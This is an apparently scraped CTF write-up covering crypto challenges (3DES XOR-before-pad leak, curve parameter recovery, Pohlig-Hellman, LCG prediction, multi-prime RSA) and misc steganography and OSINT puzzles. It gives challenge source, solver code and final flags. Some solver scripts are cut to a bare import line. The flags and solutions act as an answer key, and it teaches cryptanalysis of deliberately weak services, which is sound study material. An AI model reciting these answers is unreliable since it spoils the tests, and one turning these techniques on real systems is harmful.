3318492074423223885367923228718341206283572152570049573607906130786276734660847733952210105659707746969830132429975090175091281363770357
#c2= 353128571201645377052005694809874806643786163076931670184196149901625274899734977100920488129375537186771931435883114557320913415191396857882995726660784707377672210953334914418470453787964899846194872721616628198368241044602144880543115393715025896206210152190007408112767478800650578941849344868081146624444817544806046188600685873402369145450593575618922226415069043442295774369567389939040265656574664538667552522329712111984168798829635080641332045614585247317991581514218486004191829362787750803153463482021229058714990823658655863245025037102127138472397462755776598314247771125981017814912049441827643898478473451005083533693951329544115861795587564408860828213753948427321483082041546722974666875065831843384005041800692983406353922680299538080900818930589336142421748023025830846906503542594380663429947801329079870530727382679634952272644949425079242992486832995962516376820051495641486546631849426876810933393153871774796182078367277299340503872124124714036499367887886486264658590613431293656417255355575602576047502506125375605713228912611320198066713358654181533335650785578352716562937038768171269136647529849805172492594142026261051266577821582011917001752590659862613307646536049830151262848916867223615064832279222
#c= 375617816311787295279632219241669262704366237192565344884527300748210925539528834207344757670998995567820735715933908541800125317082581328287816628816752542104514363629022246620070560324071543077301256917337165566677142545053272381990573611757629429857842709092285442319141751484248315990593292618113678910350875156232952525787082482638460259354559904243062546518553607882194808191571131590524874275187750985821420412987586148770397073003186510357920710387377990379862185266175190503647626248057084923516190642292152259727446111686043531725993433395002330208067534104745851308178560234372373476331387737629284961288204368572750848248186692623500372605736825205759172773503283282321274793846281079650686871355211691681512637459986684769598186821524093789286661348936784712071312135814683041839882338235290487868969391040389837253093468883093296547473466050960563347060307256735803099039921213839491129726807647623542881247210251994139130146519265086673883077644185971830004165931626986486648581644383717994174627681147696341976767364316172091139507445131410662391699728189797082878876950386933926807186382619331901457205957462337191923354433435013338037399565519987793880572723211669459895193009710035003369626116024630678400746946356
#n= 728002565949733279371529990942440022467681592757835980552797682116929657292509059813629423038094227544032071413317330087468458736175902373398210691802243764786251764982802000867437756347830992118278032311046807282193498960587170291978547754942295932606784354258945168927044376692224049202979158068158842475322825884209352566494900083765571037783472505580851500043517614314755340168507097558967372661966013776090657685241689631615245294004694287660685274079979318342939473469143729494106686592347327776078649315612768988028622890242005700892937828732613800620455225438339852445425046832904615827786856105112781009995862999853122308496903885748394541643702103368974605177097553007573113536089894913967154637055293769061726082740854619536748297829779639633209710676774371525146758917646731487495135734759201537358734170552231657257498090553682791418003138924472103077035355223367678622115314235119493397080290540006942708439607767313672671274857069053688258983103863067394473084183472609906612056828326916114024662795812611685559034285371151973580240723680736227737324052391721149957542711415812665358477474058103338801398214688403784213100455466705770532894531602252798634923125974783427678469124261634518543957766622712661056594132089
Following the derivation from GKCTF 2021 - RRRRsa, eliminate the unknowns and take a gcd to obtain $p$.
e1= 113717
Simple3DES
Challenge link: nc 59.110.20.54:23333 https://blog.csdn.net/Mr_wzc/article/details/121713518
from Crypto.Cipher import DES3
from Crypto.Util.number import *
import os
import random
import string
import hashlib

xor = lambda a,b: bytes([a[i % len(a)] ^ b[i % len(b)] for i in range(max(len(a), len(b)))])
pad = lambda msg,padlen: msg+chr((padlen-(len(msg)%padlen))).encode()*(padlen-(len(msg)%padlen))

flag = os.environ.get("FLAG", "SYC{Al3XEI_FAKE_FLAG}").encode()
sec = os.urandom(8)
banner = '|'*70
DEBUG = False

def proof_of_work():
    if DEBUG:
        return True
    proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
    digest = hashlib.sha256(proof.encode()).hexdigest()
    print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
    x = input("Give me XXXX: ")
    if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
        return False
    print("Right!")
    return True

def enc(msg,key):
    try:
        key = long_to_bytes(key)
        msg = xor(long_to_bytes(msg),sec)
        des = DES3.new(key,DES3.MODE_ECB)
        ct = xor(des.encrypt(pad(msg,8)),sec)
        return bytes_to_long(ct)
    except Exception as e:
        print(e)
        return Exception

def service():
    cnt = 0
    if not proof_of_work():
        exit()
    print(banner)
    print('Simple DES Encryption Service')
    print(banner)
    while cnt<2:
        print('1. Encrypt\n2. Get encrypted flag.')
        choice = int(input('> '))
        if choice == 1:
            print('Input msg:')
            msg = int(input('> ').strip())
            print('Input key:')
            key = int(input('> ').strip())
            print(enc(msg,key))
        elif choice == 2:
            print('Input key:')
            key = int(input('> ').strip())
            print(enc(bytes_to_long(flag),key))
        else:
            exit()
        cnt+=1
    print(banner)
    print('Bye!')
    exit()

try:
    service()
except Exception:
    print("Something goes wrong...\n")
    print(banner+'\n')
    exit()
The weakness is that the secret is XORed in before padding. For m = b'\x00', m ^ sec = sec, and pad(sec, 8) = sec + b'\x08'*8.
Round 1: the padded input pad(sec, 8) = sec + b'\x08'*8 encrypts to c1^x | c2^x (x being sec). Since the second block is the encryption of b'\x08'*8 under a key we chose ourselves, c2 can be computed locally, which yields x.
Round 2: the encrypted flag c'^x is known; strip x, decrypt to get flag^x, and XOR with x once more to obtain the flag.
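Added example (not the writeup's exploit script): a local model of the service and the two-query recovery. A small hash-based Feistel cipher stands in for DES3 so the example runs without pycryptodome; the leak comes from XOR-before-pad with a user-chosen key, not from the cipher. The Service class and the test flag are constructed here, and the int/bytes conversion of the real enc() is left out.

```python
import hashlib
import os

# The page's helpers: repeating XOR and PKCS#7-style padding to a multiple of padlen.
def xor(a, b):
    return bytes([a[i % len(a)] ^ b[i % len(b)] for i in range(max(len(a), len(b)))])

def pad(msg, padlen):
    n = padlen - (len(msg) % padlen)
    return msg + bytes([n]) * n

# Hypothetical 8-byte Feistel cipher standing in for DES3 (constructed for this example only).
def _round(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]

def block_encrypt(key, block):
    l, r = block[:4], block[4:]
    for rnd in range(8):
        l, r = r, bytes(x ^ y for x, y in zip(l, _round(key, r, rnd)))
    return r + l

def block_decrypt(key, block):
    r, l = block[:4], block[4:]                      # undo the final swap
    for rnd in reversed(range(8)):
        l, r = bytes(x ^ y for x, y in zip(r, _round(key, l, rnd))), l
    return l + r

def ecb(fn, key, data):
    return b"".join(fn(key, data[i:i + 8]) for i in range(0, len(data), 8))

class Service:
    """Constructed model of the challenge's enc(): XOR with sec *before* padding, ECB, XOR with sec again."""
    def __init__(self, flag):
        self.sec = os.urandom(8)
        self.flag = flag

    def enc(self, msg, key):
        return xor(ecb(block_encrypt, key, pad(xor(msg, self.sec), 8)), self.sec)

    def enc_flag(self, key):
        return self.enc(self.flag, key)

def recover_flag(svc, key):
    # Query 1: msg = b"\x00". xor(b"\x00", sec) == sec, so the padded plaintext is sec || 0x08*8 and
    # the second ciphertext block is E_key(0x08*8) ^ sec. We chose key, so E_key(0x08*8) is known.
    ct = svc.enc(b"\x00", key)
    sec = xor(ct[8:16], block_encrypt(key, b"\x08" * 8))
    # Query 2: the flag ciphertext is E_key(pad(flag ^ sec)) ^ sec. Strip the outer mask, decrypt,
    # remove the padding, then strip the inner mask with the recovered sec.
    ct = svc.enc_flag(key)
    inner = ecb(block_decrypt, key, xor(ct, sec))
    inner = inner[:-inner[-1]]
    return xor(inner, sec)
```

Against the real service the ciphertext arrives as an int, so leading zero bytes must be restored to a multiple of 8 bytes before slicing.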
from pwn import *
JPGDiff
The string in the image is the flag.
The hint says the image is a Hilbert curve, and the long image is a 1*65536 jpg, which matches the number of points of an order-8 Hilbert curve (256*256 = 65536).
Placing each 1*1 pixel in order-8 Hilbert curve order restores the original image.
Using the hilbertcurve package to build it:
from hilbertcurve.hilbertcurve import HilbertCurve
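Added example (not the writeup's hilbertcurve script): a stand-alone distance-to-coordinate mapping for a 2^order x 2^order Hilbert curve, used to lay the 1 x 65536 strip back onto a 256 x 256 square. The pixel list and the `unfold_strip` name are this example's own; implementations differ in orientation, so a mirrored or rotated result may need flipping.

```python
def hilbert_d2xy(n, d):
    """Map distance d along an n x n Hilbert curve (n a power of two) to (x, y)."""
    x = y = 0
    s = 1
    t = d
    while s < n:
        rx = 1 & (t // 2)
        ry = 1 & (t ^ rx)
        if ry == 0:                       # rotate/flip the sub-square before stepping up a level
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        t //= 4
        s *= 2
    return x, y

def unfold_strip(pixels, order):
    """Lay a 1 x 4**order strip of pixel values onto a 2**order square in Hilbert order."""
    n = 1 << order
    if len(pixels) != n * n:
        raise ValueError("strip of %d pixels does not match order %d" % (len(pixels), order))
    grid = [[None] * n for _ in range(n)]
    for d, value in enumerate(pixels):     # d-th pixel of the strip goes to the d-th curve point
        x, y = hilbert_d2xy(n, d)
        grid[y][x] = value
    return grid

def hilbert_path(order):
    """All curve points in order; useful to sanity-check continuity (each step moves one cell)."""
    n = 1 << order
    return [hilbert_d2xy(n, d) for d in range(n * n)]
```

With Pillow, `list(Image.open("long.jpg").getdata())` gives the strip and `Image.new` plus `putpixel` writes the grid back out.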
Resulting image:
flag:SYC{H1LB5RT_C1pher}
Energetic_Carcano
Challenge link: nc 59.110.20.54:8763 https://en.wikipedia.org/wiki/Elliptic-curve_cryptography
# from sage.all import *
import os
import random
import string
import hashlib
from Crypto.Util.number import *

DEBUG = True
banner = '|'*70
flag = os.environ.get("FLAG", b"SYC{Al3XEI_FAKE_FLAG}").encode()
pbits = 120
abp = "abp"

def proof_of_work():
    if DEBUG:
        return True
    proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
    digest = hashlib.sha256(proof.encode()).hexdigest()
    print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
    x = input("Give me XXXX: ")
    if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
        return False
    print("Right!")
    return True

def check(a,b,p,turn,ans):
    if DEBUG:
        return True
    try:
        if turn == "a":
            return int(a) == ans
        if turn == "b":
            return int(b) == ans
        if turn == "p":
            return int(p) == ans
    except Exception:
        exit()

try:
    if not proof_of_work():
        exit()
    print(banner)
    print('\nHi Crypto-ers! AL3XEI here. I know you are excellent at math, so I prepared a game for u.')
    print('In the equation y^2 = x^3+ a*x + b (mod p), 4 points are given. Plz give me the right a, b or p to contine the game.')
    print('Good Luck!\n')
    print(banner+'\n')
    for i in range(10):
        turn = random.choice(abp)
        p = getPrime(pbits)
        a,b = [next_prime(random.randint(2,p)) for _ in "ab"]
        curve = EllipticCurve(GF(p),[a,b])
        pts = [curve.random_point() for _ in range(4)]
        pts = [(_[0], _[1]) for _ in pts]
        for _ in pts:
            print(_,end=" ")
        print('\nGive me '+turn+" :")
        ans = int(input('> '))
        if check(a,b,p,turn,ans):
            print("Good! Next challenge->\n")
            print(banner+'\n')
            pbits+=5
            continue
        else:
            print("Something goes wrong...\n")
            print(banner+'\n')
            exit()
    print('Congrats! Your flag is:',flag)
except Exception:
    print("Something goes wrong...\n")
    print(banner+'\n')
    exit()
This works like recovering the parameters of an LCG: use resultants to eliminate the unknowns and compute $a,b,p$.
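Added example (not the writeup's solver): the elimination carried out over the integers. Each point gives $y_i^2 - x_i^3 \equiv a x_i + b \pmod p$; differencing removes $b$, cross-multiplying two differences removes $a$, and the gcd of the leftovers is $p$ (up to a small cofactor that is stripped). `sample_points` is a constructed test helper that needs $p \equiv 3 \pmod 4$ for the square root.

```python
from math import gcd
import random

def recover_curve(pts):
    """Recover (a, b, p) from four points (x, y) on y^2 = x^3 + a*x + b (mod p), p unknown."""
    xs = [x for x, _ in pts]
    w = [y * y - x ** 3 for x, y in pts]              # w_i = a*x_i + b   (mod p)
    u = [w[i] - w[i + 1] for i in range(3)]           # u_i = a*(x_i - x_{i+1})  (mod p): b eliminated
    dx = [xs[i] - xs[i + 1] for i in range(3)]
    # The 2x2 resultant of two such relations eliminates a; each value is a multiple of p.
    m1 = u[0] * dx[1] - u[1] * dx[0]
    m2 = u[1] * dx[2] - u[2] * dx[1]
    p = gcd(m1, m2)
    # The cofactors of m1 and m2 may share a small factor; p itself is a 120+-bit prime and has none.
    for f in range(2, 1 << 12):
        while p % f == 0 and p > f:
            p //= f
    a = u[0] * pow(dx[0], -1, p) % p                  # requires Python 3.8+ for modular inverse
    b = (w[0] - a * xs[0]) % p
    return a, b, p

def sample_points(a, b, p, count, seed):
    """Constructed points for testing: pick x until x^3 + a*x + b is a square, y = v^((p+1)/4)."""
    rng = random.Random(seed)
    pts = []
    while len(pts) < count:
        x = rng.randrange(1, p)
        v = (x ** 3 + a * x + b) % p
        if pow(v, (p - 1) // 2, p) != 1:             # Euler criterion: skip non-residues
            continue
        pts.append((x, pow(v, (p + 1) // 4, p)))
    return pts
```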
from pwn import *
Just need One
Challenge link: nc 59.110.20.54:2613 One bullet to kill all Outlaws.
import os
import random
import string
import hashlib

flag = os.environ.get("FLAG", b"SYC{Al3XEI_FAKE_FLAG}")
DEBUG = False
banner = '|'*70

if DEBUG:
    print("==DEBUG MODE==")

def proof_of_work():
    if DEBUG:
        return True
    proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
    digest = hashlib.sha256(proof.encode()).hexdigest()
    print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
    x = input("Give me XXXX: ")
    if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
        return False
    print("Right!")
    return True

try:
    if not proof_of_work():
        exit()
    print(banner)
    parms = [random.getrandbits(32) for _ in range(128)]
    res = int(input('Give me x calculating f(x) :\n> '))
    if res >= 2**32:
        print("Give me something smaller.\n")
        print(banner+'\n')
        exit()
    cnt = 0
    for _ in range(128):
        cnt += pow(res,_)*parms[_]
    print(cnt)
    ans = input('Give me Coefficients :\n> ')
    ans = [int(_) for _ in ans.split(",")]
    if ans == parms:
        print('Congrats! Your flag is:',flag)
    else:
        exit()
except Exception:
    print("Something goes wrong...\n")
    print(banner+'\n')
    exit()
This is essentially base conversion: after we supply $x$, the server returns $\sum\limits_{i=0}^{127}p_ix^i$ (128 coefficients) and asks for the $p_i$; repeated modulo and integer division recover them.
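Added example (not the writeup's script): the digit extraction with the largest accepted base, $x = 2^{32}-1$, and the edge case it leaves open. The server rejects $x \ge 2^{32}$ while the coefficients are 32-bit, so a coefficient equal to $2^{32}-1$ would carry into the next digit; `unambiguous` flags that, and `constructed_params` is a seeded stand-in for the server's getrandbits values.

```python
import random

N_COEFF = 128
X = (1 << 32) - 1          # largest x the server accepts (it rejects x >= 2**32)

def evaluate(coeffs, x):
    """What the server computes and prints: sum(p_i * x**i)."""
    return sum(c * pow(x, i) for i, c in enumerate(coeffs))

def recover_coefficients(total, x, count=N_COEFF):
    """Read the coefficients back as the base-x digits of total (mod, then integer division)."""
    coeffs = []
    for _ in range(count):
        coeffs.append(total % x)
        total //= x
    if total != 0:
        raise ValueError("value has more than %d base-%d digits" % (count, x))
    return coeffs

def unambiguous(coeffs, x):
    """Base-x digits are unique only if every coefficient is < x. With x = 2**32 - 1 a coefficient
    equal to x carries into the next digit; for 128 random 32-bit values that happens with
    probability about 128 / 2**32 per game, so in practice one query is enough."""
    return all(c < x for c in coeffs)

def constructed_params(seed, count=N_COEFF):
    """Constructed stand-in for the server's parms list."""
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(count)]
```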
from pwn import *
Fi1nd_th3_x’
Rumor has it a traveler called jrl777 is on that continent... A Cryptoer who crosses over to Teyvat has to show real skill!
from Crypto.Util.number import *
from libnum import*
from secret import flag
p = getPrime(512)
q = getPrime(512)
r = getPrime(512)
e = getPrime(32)
n = p*q*r
phi = (p-1)*(q-1)*(r-1)
d = inverse(e,phi)
dP = d%((q-1)*(r-1))
dQ = d%((p-1)*(r-1))
dR = d%((p-1)*(q-1))
m = s2n(flag.encode())
c = pow(m,e,n)
print('p=',p)
print('q=',q)
print('r=',r)
print('dP=',dP)
print('dQ=',dQ)
print('dR=',dR)
print('c=',c)
'''
p= 13014610351521460822156239705430709078128228907778181478242620569429327799535062679140131416771915929573454741755415612880788196172134695027201422226050343
q= 12772373441651008681294250861077909144300908972709561019514945881228862913558543752401850710742410181542277593157992764354184262443612041344749961361188667
r= 12128188838358065666687296689425460086282352520167544115899775800918383085863282204525519245937988837403739683061218279585168168892037039644924073220678419
dP= 116715737414908163105708802733763596338775040866822719131764691930369001776551671725363881836568414327815420649861207859100479999650414099346914809923964116101517432576562641857767638396325944526867458624878906968552835814078216316470330511385701105459053294771612727181278955929391807414985165924450505855941
dQ= 44209639124029393930247375993629669338749966042856653556428540234515804939791650065905841618344611216577807325504984178760405516121845853248373571704473449826683120387747977520655432396578361308033763778324817416507993263234206797363191089863381905902638111246229641698709383653501799974217118168526572365797
dR= 60735172709413093730902464873458655487237612458970735840670987186877666190533417038325630420791294593669609785154204677845781980482700493870590706892523016041087206844082222225206703139282240453277802870868459288354322845410191061009582969848870045522383447751431300627611762289800656277924903605593069856921
c= 93063188325241977486352111369210103514669725591157371105152980481620575818945846725056329712195176948376321676112726029400835578531311113991944495646259750817465291340479809938094295621728828133981781064352306623727112813796314947081857025012662546178066873083689559924412320123824601550896063037191589471066773464829226873338699012924080583389032903142107586722373131642720522453842444615499672193051587154108368643495983197891525747653618742702589711752256009
'''
Since $m<qr$, $m<pr$ and $m<pq$, we have $m=c^{dP} \bmod {qr}=c^{dQ} \bmod {pr}=c^{dR} \bmod {pq}$; otherwise CRT would be needed to recover $m$.
p= 13014610351521460822156239705430709078128228907778181478242620569429327799535062679140131416771915929573454741755415612880788196172134695027201422226050343
Quick_Robert
Challenge link: nc 59.110.20.54:3042 https://en.wikipedia.org/wiki/Quadratic_residue
Following Some sums of Legendre's symbols, use the summation property of quadratic residues:
$\sum\limits_{x=0}^{p-1}\left(\cfrac{ax^2+bx+c}{p}\right) = \begin{cases} -\left(\cfrac{a}{p}\right), & p \nmid b^2-4ac \\ (p-1)\left(\cfrac{a}{p}\right), & p \mid b^2-4ac \end{cases}$
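Added example (not the writeup's script): the closed form beside a brute-force sum so the identity can be checked on small primes before trusting it at the challenge's sizes. The identity assumes $p$ is an odd prime not dividing $a$; the function refuses the $p \mid a$ case rather than returning a wrong value.

```python
def legendre(a, p):
    """Legendre symbol (a/p) for an odd prime p via Euler's criterion."""
    a %= p
    if a == 0:
        return 0
    return 1 if pow(a, (p - 1) // 2, p) == 1 else -1

def quadratic_legendre_sum(a, b, c, p):
    """Closed form for sum_{x=0}^{p-1} ((a x^2 + b x + c)/p), valid for odd prime p with p not | a."""
    if a % p == 0:
        raise ValueError("the identity needs p not dividing a")
    disc = (b * b - 4 * a * c) % p
    # Zero discriminant: a perfect-square polynomial, every term is (a/p) except the single root.
    return (p - 1) * legendre(a, p) if disc == 0 else -legendre(a, p)

def brute_force_sum(a, b, c, p):
    """Direct evaluation, only feasible for small p; used to validate the closed form."""
    return sum(legendre(a * x * x + b * x + c, p) for x in range(p))
```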
from pwn import *
Diligent_Liszt
https://en.wikipedia.org/wiki/Discrete_logarithm
import gmpy2 as gp
import random
from Crypto.Util.number import *

DEBUG = False
flag = b"SYC{Al3XEI_FAKE_FLAG}"
assert flag.startswith(b"SYC")
nbits = 512
g = 3

def gen_p_1(digit):
    primes = []
    pri = 1
    while(len(primes)<100):
        pri = gp.next_prime(pri)
        primes.append(int(pri))
    while True:
        count = 2
        while count < 2**digit:
            count *= random.choice(primes)
        count += 1
        if(gp.is_prime(count)):
            return count

p,q,r = [gen_p_1(nbits) for _ in "pqr"]
n = p*q*r
x = bytes_to_long(flag)
y = gp.powmod(g,x,n)
print("p = {}".format(p))
print("q = {}".format(q))
print("r = {}".format(r))
print("y = {}".format(y))
if DEBUG:
    print("x = {}".format(x))
'''
p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421
q = 1711302770747802020613711652777299980542669713888988077474955896217408515180094849053961025086865697904731088087532944829046702427480842253022459937172565651
r = 132969813572228739353704467775972551435751558645548804253458782569132362201099158857093676816706297676454547299888531536236748314013888413096371966359860637
y = 5385116324746699759660077007129548063211490907227715474654765255668507958312745677683558789874078477569613259930365612562164095274660123330458355653249805062678976259429733060364358954180439218947514191603330532117142653558803034110759332447742304749985874760435453594107494324797235909651178472904825071375135846093354526936559640383917210702874692725723836865724807664892994298377375580807917514349966834376413176898806591411038129330967050554114677719107335006266
'''
A DLP: Pohlig–Hellman plus CRT.
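Added example (not the writeup's solver): Pohlig–Hellman in one prime field GF(p) whose p-1 is smooth, as gen_p_1 guarantees. It computes the exact order of g first, since g = 3 is not guaranteed to generate the whole group, handles prime powers digit by digit, and recombines with CRT. The test primes 2311 and 97 are constructed, not the challenge's.

```python
def factor_smooth(n, bound=600):
    """Trial division only; sufficient because gen_p_1 builds p-1 from the first 100 primes (all < 550)."""
    factors = {}
    d = 2
    while d <= bound and n > 1:
        while n % d == 0:
            factors[d] = factors.get(d, 0) + 1
            n //= d
        d += 1
    if n != 1:
        raise ValueError("cofactor %d is not %d-smooth" % (n, bound))
    return factors

def element_order(g, p, group_order):
    """Exact multiplicative order of g mod p, starting from the full group order p-1."""
    order = group_order
    for q in factor_smooth(group_order):
        while order % q == 0 and pow(g, order // q, p) == 1:
            order //= q
    return order

def dlog_prime_power(g, h, p, q, e, order):
    """x mod q**e for g of the given order, one base-q digit at a time."""
    gamma = pow(g, order // q, p)                 # element of order exactly q
    x = 0
    for k in range(e):
        # Peel off the digits found so far; what remains is gamma ** (k-th digit).
        hk = pow(h * pow(g, -x, p), order // q ** (k + 1), p)
        for digit in range(q):                    # q <= 541 here, so brute force is fine
            if pow(gamma, digit, p) == hk:
                x += digit * q ** k
                break
        else:
            raise ValueError("h is not in the subgroup generated by g")
    return x

def pohlig_hellman(g, h, p):
    """Solve g**x == h (mod p); the result is x modulo ord(g), combined with CRT over prime powers."""
    order = element_order(g, p, p - 1)
    x, modulus = 0, 1
    for q, e in factor_smooth(order).items():
        r, m = dlog_prime_power(g, h, p, q, e, order), q ** e
        x += modulus * (((r - x) * pow(modulus, -1, m)) % m)
        modulus *= m
    return x % modulus
```

For the challenge's n = pqr one runs this in GF(p), GF(q) and GF(r) and combines the three results; note that (p-1), (q-1), (r-1) are all even and built from the same primes, so that final combination must use lcm-based CRT, and if the flag integer is smaller than ord_p(g) the GF(p) result alone is already x.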
p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421
card_game
AL3XEI has handed you the key data of this game; can you predict the cards that come next? nc 59.110.20.54 4953
from Crypto.Util.number import *
from cards import Heart, Spade, Club, Diamond
from secret import flag

def choose_card(num):
    x = (num>>5)%4
    if x == 0:
        return (Heart[(num>>6)%13]), 'Heart'
    if x%4 == 1:
        return (Spade[(num>>6)%13]), 'Spade'
    if x%4 == 2:
        return (Diamond[(num>>6)%13]), 'Diamond'
    else:
        return (Club[(num>>6)%13]), 'Club'

def GAME():
    banner = '''
#### ## ##### ##### #### ## # # ######
# # # # # # # # # # # # ## ## #
# # # # # # # # # # # ## # #####
# ###### ##### # # # ### ###### # # #
# # # # # # # # # # # # # # #
#### # # # # ##### #### # # # # ######
'''
    print(banner)
    meum = '''option:
1: start game
2: get hint
3: exit
'''
    print(meum)
    while True:
        print('input your option: ', end='')
        your_input = input()
        if your_input == '1':
            n = getPrime(36)
            m = getPrime(16)
            c = getPrime(16)
            seed = getPrime(36)
            out = seed
            round = 0
            score = 0
            res = []
            while True:
                round += 1
                res = []
                print(f'round:{round}')
                print(f'score:{score}')
                for i in range (3):
                    out = (out*m+c)%n
                    res.append(out)
                if round == 1:
                    for i in res:
                        card, suit = choose_card(i)
                        print(card)
                elif round==2 or round==3: #gift
                    for i in res:
                        card, suit = choose_card(i)
                        print(card)
                    print(f'gift: {res}')
                else:
                    cards = []
                    suits = []
                    for i in range(len(res)):
                        card, suit = choose_card(res[i])
                        cards.append(card)
                        suits.append(suit)
                    print("Give me your guess: (example: Heart_1 Club_2 Diamond_3)")
                    try:
                        g_1, g_2, g_3 = input().split()
                        g_1, g_2, g_3 = g_1.split('_'), g_2.split('_'), g_3.split('_')
                    except ValueError:
                        print("Please enter in the correct format.")
                        return
                    if (g_1[0] == suits[0] and g_1[1] == cards[0][15]) and (g_2[0] == suits[1] and g_2[1] == cards[1][15]) and (g_3[0] == suits[2] and g_3[1] == cards[2][15]):
                        for i in cards:
                            print(i)
                        print("Congratulations! You matched the cards!")
                        score += 1
                    else:
                        for i in cards:
                            print(i)
                        print("Try again!")
                if score == 50:
                    print('The flag is your reward!')
                    print(flag)
                    return
                else:
                    continue
        if your_input == '2':
            print("Have you ever heard of LCG?")
        if your_input == '3':
            break

if __name__ == '__main__':
    GAME()
The logic is essentially an LCG. One pitfall: the check compares a single character (cards[i][15]), so when answering, 10 is 0.
from pwn import *
EzComplex
And u, my friend: Complex factors! (In a double sense)
Gaussian integer factorization.
c = 122977267154486898127643454001467185956864368276013342450998567212966113302012584153291519651365278888605594000436279106907163024162771486315220072170917153855370362692990814276908399943293854077912175867886513964032241638851526276
Then regular RSA:
p,q = (8732781022306464325787401448517171026218291389436971731700810979177651389459896422549428444142746055523338740248707, 29962125885196559918101088622575501736433575381042696980660846307183241725227137854663856022170515177120773072848343)
ext^7gcd
Challenge link: nc 59.110.20.54:1789 (Install sagemath! Anyone who doesn't gets shipped off to Antonstar as a laborer!)
Analysis:
a1*p1+a2*p2=1
from pwn import *
Algebra
Recently jrl888 has learned something about groebner_basis. But could U plz help him to solve his linear algebra homework?
The matrix product is 1*32 * 32*16 = 1*16; construct a lattice and reduce:
p = 76231309481023608274751321361920497941621991893430257210800219032855778863403
Then, from
x1^e0%p=c0
key = [241, 234, 29, 209, 141, 236, 196, 125, 153, 121, 243, 104, 157, 250, 164, 197, 241, 85, 184, 247, 145, 27, 128, 184, 203, 233, 104, 196, 118, 255, 12, 24]
flag:SYC{You_are_really_algebra_master}
MISC
cheekin
Go to the "三叶草小组Syclover" WeChat official account and send "flag" to get the flag.
Send "flag" and download the image; zsteg channel b1,rgb,lsb,xy contains syc{s4y_he110_t0_syclover}.
ez_smilemo
Finishing the game gives the flag content; wrap it in SYC{} yourself. Example: if the flag content is haha_haha, the final flag is SYC{haha_haha}. Challenge link: https://pan.baidu.com/s/1Vfklz0_isBoHNylRv8um8w?pwd=geek hint: data.win
Unpack data.win with UndertaleModTool; in the Strings window you find c20xbGVfMXNfQF9uMWNlX2dAbWU=, which base64-decodes to sm1le_1s_@_n1ce_g@me.
flag:SYC{sm1le_1s_@_n1ce_g@me}
DEATH_N0TE
"o2takuXX has suddenly gone missing. As his good friend, you decide to look around his room for any clues..." A prologue challenge; the flag has two parts and there is quite a lot of hidden information, so collect all of it. hint1: Stegsolve lsb hint2: image dimensions and pixels
Extracted from the end of the png:
base64 decoded:
"You found a DEATH NOTE. Curiosity drives you to open the notebook; you read the rules of use, but are surprised to find that rule 10 alone is missing..." "You check again, but the writing on the notebook seems to come alive, growing and shrinking before your eyes, and you close them..." "The black text turns blood red, the eerie image still appears before your retina; you decide to stop dwelling on the missing rule, and the hallucination fades..."
Not useful. zsteg on channel b1,rgb,lsb,xy extracts:
IuS9oOe7p+e7reinguWvn+aJi+S4iua8hum7keiJsueahOeslOiusOacrO+8jOWGt+mdmeS4i+adpeeahOS9oOWPkeeOsOS6huiXj+WcqOWwgemdouacgOS4i+i+ueeahOS4gOihjOWwj+WtlzpTWUN7RDRAVGhfTjB0NF8iCiLkvaDmtY/op4jov4fmlbTkuKrnrJTorrDmnKzvvIzlj6/mg5zlhajmmK/nqbrnmb3pobXvvIzlhbbkuK3mnInkuIDpobXkuI3nn6XpgZPooqvosIHmkpXmjonkuobvvIzkvaDmnIDnu4jov5jmmK/nv7vliLDkuobnvLrlpLHnmoTpgqPkuIDpobUiCiLkvaDnlKjpk4XnrJTmtoLmirnnnYDlkI7pnaLkuIDpobXvvIzkuIrpnaLnvJPnvJPlh7rnjrDkuobpgZflpLHnmoTnl5Xov7kuLi4i
base64 decoded:
"You keep examining the pitch-black notebook in your hands; having calmed down, you notice a line of small text hidden at the bottom of the cover: SYC{D4@Th_N0t4_" "You flip through the whole notebook; unfortunately it is all blank pages, and one page has been torn out by someone; you finally reach the missing page" "You rub a pencil over the following page, and traces of what was lost slowly appear..."
That gives the first half of the flag: SYC{D4@Th_N0t4_.
Zooming in on the image reveals white pixels; given the challenge theme, these turn out to be the Death Note font, spelling the string TkFNRV9vMnRha3VYWH0
which base64-decodes to the second half of the flag: NAME_o2takuXX}.
flag:SYC{D4@Th_N0t4_NAME_o2takuXX}
Where is the next stop? (下一站是哪儿呢)
yxx and I went traveling. Everything was fine the day before: we played Commander Keen and went to sleep, and the next evening after dinner she was gone, leaving two pictures behind. Can you help me find which flight she took and where she went? Flag format: SYC{flightnumber_CityPinyin}, with the city pinyin capitalized
Search for "airport with a white piano" together with Baidu reverse image search; the location is Shenzhen Bao'an International Airport (深圳宝安国际机场).
A zip extracted from 1.jpg yields secret.png, written in the Standard Galactic Alphabet; an online decoder gives: I WANT TO GO TO LIQUOR CITY.
LIQUOR CITY = 酒城 = 泸州市, city pinyin: Luzhou.
From the picture: time 8.25 20:19, about to take off; searching flightstats for Shenzhen-Luzhou gives flight number CZ8579.
flag:SYC{CZ8579_Luzhou}
Qingwan is heartbroken (Qingwan心都要碎了)
Qingwan and Yxx went traveling together, but Qingwan slept too deeply and Yxx left her behind to go have fun. When she woke up all she saw was Yxx's WeChat Moments post. Can you help Qingwan find her? Flag format: SYC{place name}
Baidu reverse image search.
SYC{重庆中国三峡博物馆}
xqr
Qrcode can deliver binary msg
Splitting the png yields two png images; XORing them pixel by pixel gives a new QR code.
from PIL import Image
flag:SYC{hOp3_u_h@ve_Fun}
DEATH_N1TE
"You saw the name on the DEATH NOTE. Just then, Arahat0 sends you two files with the message:" "[He has the Shinigami eyes, be careful, he is looking for you, 1920 seconds left...]" "<current time 10:52>". The flag has two parts
Convert the webp to gif online and split it with gifsplitter into 880 frames.
